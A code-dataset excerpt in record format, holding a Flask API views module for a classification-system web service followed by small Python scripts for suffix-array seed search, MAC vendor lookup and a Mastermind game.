Classification System Classes\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{class_system['id']}/style_formats\",\n \"rel\": \"style_formats\",\n \"type\": \"application/json\",\n \"title\": \"Link to Available Style Formats\",\n },\n {\n \"href\": f\"{BASE_URL}/mappings/{class_system['id']}\",\n \"rel\": \"mappings\",\n \"type\": \"application/json\",\n \"title\": \"Link to Classification Mappings\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n ]\n \n class_system[\"links\"] = links\n \n return jsonify(classification_systems_list)\n\n\n@current_app.route(\"/classification_systems/\", methods=[\"GET\"])\ndef classification_systems(system_id):\n \"\"\"Retrieve information about the classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n classification_system = data.get_classification_system(system_id)\n \n if not classification_system:\n abort(404, \"Classification System not found.\")\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": \"The classification_system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes\",\n \"rel\": \"classes\",\n \"type\": \"application/json\",\n \"title\": \"The classes related to this item\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n \"rel\": \"styles_formats\",\n \"type\": \"application/json\",\n \"title\": \"The styles formats related to this item\",\n },\n {\n \"href\": f\"{BASE_URL}/mappings/{system_id}\",\n \"rel\": \"mappings\",\n \"type\": \"application/json\",\n \"title\": \"The classification system mappings\",\n },\n {\"href\": f\"{BASE_URL}/\", \"rel\": \"root\", \"type\": \"application/json\", \"title\": \"API landing page.\"},\n ]\n \n classification_system[\"links\"] = links\n \n return classification_system\n\n\n@current_app.route(\"/classification_systems//classes\", methods=[\"GET\"])\ndef classification_systems_classes(system_id):\n \"\"\"Retrieve the classes of a classification system.\n \n :param system_id: identifier of a classification system\n \"\"\"\n classes_list = data.get_classification_system_classes(system_id)\n\n links = list()\n \n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": f\"Classes of the classification system {system_id}\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n\n if not len(classes_list) > 0:\n return jsonify(links)\n \n for system_classes in classes_list:\n links.append(\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes/{system_classes['id']}\",\n \"rel\": \"child\",\n \"type\": \"application/json\",\n \"title\": \"Classification System Classes\",\n }\n )\n return jsonify(links)\n\n\n@current_app.route(\"/classification_systems//classes/\", methods=[\"GET\"])\ndef classification_systems_class(system_id, class_id):\n \"\"\"Retrieve class information from a classification system.\n\n :param system_id: identifier of a classification system\n :param class_id: identifier of a class\n \"\"\"\n classes = data.get_classification_system_class(system_id, class_id)\n \n if not len(classes) > 0:\n abort(404, f\"Class not found.\")\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes/{classes['id']}\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/classes\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to this document\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n \n ]\n \n classes[\"links\"] = links\n \n return classes\n\n\n@current_app.route(\"/mappings/\", methods=[\"GET\"])\ndef get_mappings(system_id):\n \"\"\"Retrieve available mappings for a classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n mappings = data.get_mappings(system_id)\n \n if not len(mappings) > 0:\n abort(404, f\"Mappings not found.\")\n \n links = list()\n \n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n \n for mapping_system in mappings:\n links.append({\n \"href\": f\"{BASE_URL}/mappings/{system_id}/{mapping_system}\",\n \"rel\": \"child\",\n \"type\": \"application/json\",\n \"title\": \"Mapping\",\n })\n \n return jsonify(links)\n\n\n@current_app.route(\"/mappings//\", methods=[\"GET\"])\ndef get_mapping(system_id_source, system_id_target):\n \"\"\"Retrieve mapping.\n\n :param system_id_source: identifier of source classification system\n :param system_id_target: identifier of target classification system\n \"\"\"\n class_system_mappings = data.get_mapping(system_id_source, system_id_target)\n \n for mp in class_system_mappings:\n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id_source}/classes/{mp['source_class_id']}\",\n \"rel\": \"item\",\n \"type\": \"application/json\",\n \"title\": \"Link to source class\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id_target}/classes/{mp['target_class_id']}\",\n \"rel\": \"item\",\n \"type\": \"application/json\",\n \"title\": \"Link to target class\",\n },\n ]\n mp[\"degree_of_similarity\"] = float(mp[\"degree_of_similarity\"])\n mp[\"links\"] = links\n \n return jsonify(class_system_mappings)\n\n\n@current_app.route(\"/style_formats\", methods=[\"GET\"])\ndef get_styles_formats():\n \"\"\"Retrieve available style formats in service.\"\"\"\n styles_formats = data.get_style_formats()\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n \n for st_f in styles_formats:\n links.append({\n \"href\": f\"{BASE_URL}/style_formats/{st_f['id']}\",\n \"rel\": \"items\",\n \"type\": \"application/json\",\n \"title\": f\"Link to style format {st_f['id']}\"\n })\n \n return jsonify(links)\n\n\n@current_app.route(\"/style_formats/\", methods=[\"GET\"])\ndef get_style_format(style_format_id):\n \"\"\"Retrieve information of a style formats.\n\n :param style_format_id: identifier of a style format\n \"\"\"\n styles_format = data.get_style_format(style_format_id=style_format_id)\n \n if not len(styles_format) > 0:\n abort(404, f\"Style Format not found.\")\n \n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"classification_systems\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n {\n \"href\": f\"{BASE_URL}/style_formats/{styles_format['id']}\",\n \"rel\": \"style_format\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/style_formats/\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n ]\n \n styles_format[\"links\"] = links\n \n return styles_format\n\n\n@current_app.route(\"/classification_systems//style_formats\", methods=[\"GET\"])\ndef get_style_formats_classification_system(system_id):\n \"\"\"Retrieve available style formats for a classification system.\n\n :param system_id: identifier of a source classification system\n \"\"\"\n style_formats_id = data.get_system_style_format(system_id=system_id)\n \n if not len(style_formats_id) > 0:\n abort(404, f\"Style Formats not found.\")\n \n links = list()\n \n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": f\"Available style formats for {system_id}\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n \n for style_id in style_formats_id:\n links.append(\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/styles/{style_id[0]}\",\n \"rel\": \"style\",\n \"type\": \"application/json\",\n \"title\": \"Link to style\",\n }\n )\n \n return jsonify(links)\n\n\n@current_app.route(\"/classification_systems//styles/\", methods=[\"GET\"])\ndef style_file(system_id, style_format_id):\n \"\"\"Retrieve available styles.\n\n :param system_id: identifier of a classification system\n :param style_format_id: identifier of a style format\n \"\"\"\n system_style_file = data.get_classification_system_style(system_id, style_format_id)\n \n if not system_style_file:\n abort(404, f\"Style File not found.\")\n \n extension = get_extension(system_style_file.mime_type)\n \n system = data.classification_system(system_id)\n style_format = data.get_style_format(style_format_id)\n \n file_name = f\"{system.name}_version-{system.version}_{style_format['name']}\" + extension\n \n return send_file(BytesIO(system_style_file.style), mimetype='application/octet-stream', as_attachment=True,\n attachment_filename=file_name)\n\n\n@current_app.route(\"/classification_systems/search//\", methods=[\"GET\"])\ndef classification_system_search(system_name, system_version):\n \"\"\"Return identifier of a classification system.\n \n :param system_name: name of a classification system\n :param system_version: version of a classification system\n \"\"\"\n system = data.get_identifier_system(system_name, system_version)\n \n return ClassificationSystemSchema().dump(system), 200\n\n\n@current_app.route(\"/style_formats/search/\", methods=[\"GET\"])\ndef style_format_search(style_format_name):\n \"\"\"Return identifier of a style format.\n \n :param style_format_name: name of a style format\n \"\"\"\n style_format = data.get_identifier_style_format(style_format_name)\n \n return StyleFormatsSchema().dump(style_format), 200\n\n\n@current_app.route('/classification_systems', defaults={'system_id': None}, methods=[\"POST\"])\n@current_app.route(\"/classification_systems/\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=[\"admin\"])\ndef edit_classification_system(system_id, **kwargs):\n \"\"\"Create or edit a specific classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n if request.method == \"POST\":\n args = request.get_json()\n \n errors = ClassificationSystemSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n classification_system = data.create_classification_system(**args)\n \n return ClassificationSystemSchema().dump(classification_system), 201\n \n if request.method == \"DELETE\":\n data.delete_classification_system(system_id)\n \n return {'message': f'{system_id} deleted'}, 204\n \n if request.method == \"PUT\":\n args = request.get_json()\n \n errors = ClassificationSystemMetadataSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n classification_system = data.update_classification_system(system_id, args)\n \n return ClassificationSystemSchema().dump(classification_system), 200\n\n\n@current_app.route(\"/classification_systems//classes\", methods=[\"POST\"])\n@oauth2(roles=[\"admin\"])\ndef create_class_system_classes(system_id, **kwargs):\n \"\"\"Create classes for a classification system.\n\n :param system_id: identifier of a classification system\n \"\"\"\n args = request.get_json()\n \n errors = ClassesSchema(many=True).validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n classes = data.insert_classes(system_id, args)\n \n result = ClassesSchema().dump(classes, many=True)\n \n return jsonify(result), 201\n\n\n@current_app.route(\"/classification_systems//classes/\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=[\"admin\"])\ndef edit_class_system_class(system_id, class_id, **kwargs):\n \"\"\"Delete class of a specific classification system.\n \n :param system_id: identifier of a classification system\n :param class_id: identifier of a class\n \"\"\"\n if request.method == \"DELETE\":\n data.delete_class(system_id, class_id)\n \n return {'message': f'{class_id} deleted'}, 204\n \n if request.method == \"PUT\":\n \n args = request.get_json()\n \n errors = ClassMetadataSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n system_class = data.update_class(system_id, class_id, args)\n \n return ClassesSchema().dump(system_class), 200\n\n\n@current_app.route(\"/mappings//\", methods=[\"POST\", \"PUT\", \"DELETE\"])\n@oauth2(roles=['admin'])\ndef edit_mapping(system_id_source, system_id_target, **kwargs):\n \"\"\"Create or edit mappings in service.\n \n :param system_id_source: identifier of a source classification system\n :param system_id_target: identifier of a target classification system\n \"\"\"\n if request.method == \"POST\":\n args = request.get_json()\n \n errors = ClassesMappingSchema(many=True).validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n mappings = data.insert_mappings(system_id_source, system_id_target, args)\n \n return jsonify(ClassesMappingSchema().dump(mappings, many=True)), 201\n \n if request.method == \"DELETE\":\n data.delete_mappings(system_id_source, system_id_target)\n \n return {'message': 'Mapping delete!'}, 204\n \n if request.method == \"PUT\":\n args = request.get_json()\n \n errors = ClassesMappingMetadataSchema(many=True).validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n mappings = data.update_mappings(system_id_source, system_id_target, args)\n \n return jsonify(ClassesMappingSchema().dump(mappings, many=True)), 200\n\n\n@current_app.route(\"/classification_systems//styles\", defaults={'style_format_id': None}, methods=[\"POST\"])\n@current_app.route(\"/classification_systems//styles/\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=['admin'])\ndef edit_styles(system_id, style_format_id, **kwargs):\n \"\"\"Create or edit styles.\n\n :param system_id: identifier of a specific classification system\n :param style_format_id: identifier of a specific style format.\n \"\"\"\n if request.method == \"POST\":\n \n if 'style_format_id' not in request.form:\n return abort(404, \"Invalid parameter.\")\n \n style_format_id = request.form.get('style_format_id')\n \n if 'style' not in request.files:\n return abort(404, \"Invalid parameter.\")\n \n file = request.files['style']\n \n data.insert_file(style_format_id=style_format_id,\n system_id=system_id,\n file=file)\n \n links = list()\n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/styles/{style_format_id}\",\n \"rel\": \"style\",\n \"type\": \"application/json\",\n \"title\": \"style\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": f\"Styles of the classification system {system_id}\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n return jsonify(links)\n \n if request.method == \"PUT\":\n if 'style' not in request.files:\n return abort(500, \"Style File not found!\")\n \n file = request.files['style']\n \n data.update_file(style_format_id=style_format_id,\n system_id=system_id,\n file=file)\n \n links = list()\n links += [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/styles/{style_format_id}\",\n \"rel\": \"style\",\n \"type\": \"application/json\",\n \"title\": \"style\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}/style_formats\",\n \"rel\": \"self\",\n \"type\": \"application/json\",\n \"title\": f\"Styles of the classification system {system_id}\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{system_id}\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification system\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems\",\n \"rel\": \"parent\",\n \"type\": \"application/json\",\n \"title\": \"Link to classification systems\",\n },\n {\n \"href\": f\"{BASE_URL}/\",\n \"rel\": \"root\",\n \"type\": \"application/json\",\n \"title\": \"API landing page\",\n },\n ]\n return jsonify(links)\n \n if request.method == \"DELETE\":\n data.delete_file(style_format_id, system_id)\n \n return {'message': 'deleted!'}, 204\n\n\n@current_app.route(\"/style_formats\", defaults={'style_format_id': None}, methods=[\"POST\"])\n@current_app.route(\"/style_formats/\", methods=[\"PUT\", \"DELETE\"])\n@oauth2(roles=['admin'])\ndef edit_style_formats(style_format_id, **kwargs):\n \"\"\"Create or edit styles formats.\n \n :param style_format_id: identifier of a specific style format\n \"\"\"\n if request.method == \"POST\":\n args = request.get_json()\n \n errors = StyleFormatsSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n style_format = data.create_style_format(**args)\n \n return jsonify(StyleFormatsSchema().dump(style_format)), 201\n \n if request.method == \"DELETE\":\n data.delete_style_format(style_format_id)\n \n return {'message': 'deleted'}, 204\n \n if request.method == \"PUT\":\n args = request.get_json()\n \n errors = StyleFormatsMetadataSchema().validate(args)\n \n if errors:\n return abort(400, str(errors))\n \n style_format = data.update_style_format(style_format_id, **args)\n \n return jsonify(StyleFormatsSchema().dump(style_format)), 200\n","sub_path":"lccs_ws/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"260387516","text":"'''\nCreated on 30 sept. 2015\n\n@author: perard\n'''\nimport logging\n\nlogger = logging.getLogger()\n\ndef init(genome, read):\n n = len(genome)\n suffixes = range(n)\n suffixes = sorted(suffixes, key=lambda i: genome[i:])\n return suffixes\n\ndef find(seed, suffixes, genome, i=None, j=None, occurs=[]):\n i = 0 if i == None else i\n j = len(suffixes)-1 if j == None else j\n while i < j:\n m = i + int(round((j-i+1) / 2))\n index = suffixes[m]\n if genome[index:].startswith(seed):\n occurs.append(index)\n find(seed, suffixes, genome, i, m-1, occurs)\n find(seed, suffixes, genome, m+1, j, occurs)\n return occurs\n elif seed < genome[index:]:\n j = m - 1\n else:\n i = m + 1\n return occurs\n","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"269573514","text":"import json, requests, sys, getopt\n\n#Globals for the program\nmac = 0\nrepetitive = False\n\n#show the documentation\ndef usage():\n print(\"\\nMAC OUI Information Tool\\n\")\n print(\"Usage:\\n\")\n print(\"\\t-h, --help\\t|\\tdisplays this text\\n\")\n print(\"\\t-m, --mac\\t|\\tmac address to look up\\n\")\n print(\"\\t-r, --repete\\t|\\tenable repetitive mode\")\n sys.exit(0)\n\ndef GetMacInfo(Mac):\n try:\n f = json.load(open(\"oui.json\", \"r\"))\n except:\n try:\n f = open(\"oui.txt\", \"r\", errors=\"ignore\").read()\n except:\n print(\"downloading oui.txt\")\n r = requests.get(\"http://standards.ieee.org/develop/regauth/oui/oui.txt\")\n f = open(\"oui.txt\", \"w\", errors=\"ignore\").write(r.text)\n f = open(\"oui.txt\", \"r\", errors=\"ignore\").read()\n print(\"generating oui.json\")\n f = f.split(\"\\n\\n\\n\")[1:]\n js = {}\n\n for i in f:\n i = i.split(\"\\n\\n\")\n \n if len(i)==5:\n oui = i[0][1:9].replace(\"-\",\":\").lower()\n js[oui] = {}\n js[oui][\"org\"] = i[0][17:].replace(\"\\t\", \"\")\n js[oui][\"address\"] = (i[2]+\" \"+i[3]).replace(\"\\t\", \"\")\n js[oui][\"country\"] = i[4].replace(\"\\t\", \"\")\n \n elif len(i)==2:\n oui = i[0][0:8].replace(\"-\",\":\")\n js[oui] = {}\n js[oui][\"org\"] = i[0][16:].replace(\"\\t\", \"\")\n\n json.dump(js, open(\"oui.json\", \"w\"))\n f = json.load(open(\"oui.json\", \"r\"))\n try:\n return f[Mac[0:8].lower().replace(\"-\", \":\")]\n except:\n return {\"org\":None, \"address\":None, \"country\":None}\n\nif __name__ == \"__main__\":\n\n if len(sys.argv)==1:\n usage()\n \n #Parse all commandline arguments\n try:\n opts, args = getopt.getopt(sys.argv[1:],\"hm:r\",\n [\"help\",\"mac\",\"repete\"])\n except getopt.GetoptError as err:\n print(str(err))\n usage()\n\n for o,a in opts:\n if o in (\"-h\",\"--help\"):\n usage()\n elif o in (\"-m\", \"--mac\"):\n mac = a\n elif o in (\"-r\", \"--repete\"):\n repetitive = True\n else:\n print(\"Unhandled Argument\\n\")\n usage()\n \n #Repetitive Mode\n if repetitive:\n try:\n while True:\n info = GetMacInfo(input(\"MAC:\\t\"))[\"org\"]\n print(info)\n except KeyboardInterrupt:\n print(\"\\nDone...\")\n\n #CMD Mode\n elif mac != \"\":\n info = GetMacInfo(mac)[\"org\"]\n print(info)\n","sub_path":"Networking/MAC 802.11/ouilookup.py","file_name":"ouilookup.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6619805","text":"import random\n\ncolor_list = [\"blue\", \"green\", \"yellow\", \"red\", \"white\", \"black\", \"violet\", \"grey\"]\n\ncode_maker=[]\n\nwhile len(code_maker) < 4:\n new_color = random.choice(color_list)\n code_maker.append(new_color)\n \nprint(code_maker)\n\ndef game_loop():\n print(\"Hi, welcome to Mastermind ! Please write 4 colours and press enter after each one.\")\n\n code_breaker = []\n for i in range(len(code_maker)):\n code_breaker.append(input())\n\n\n good_color_good_place = 0\n good_color_bad_place = 0\n final_score = []\n\n for i in range(len(code_maker)):\n for j in range(len(code_breaker)):\n if code_maker[i] == code_breaker[j] and i == j:\n good_color_good_place += 1\n elif code_maker[i] == code_breaker[j] and i != j:\n good_color_bad_place += 1 \n\n final_score.append(good_color_good_place)\n final_score.append(good_color_bad_place)\n print(final_score)\n\ngame = 0\n\nwhile game <= 12:\n game_loop()\n game = game + 1","sub_path":"Mastermind.py","file_name":"Mastermind.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}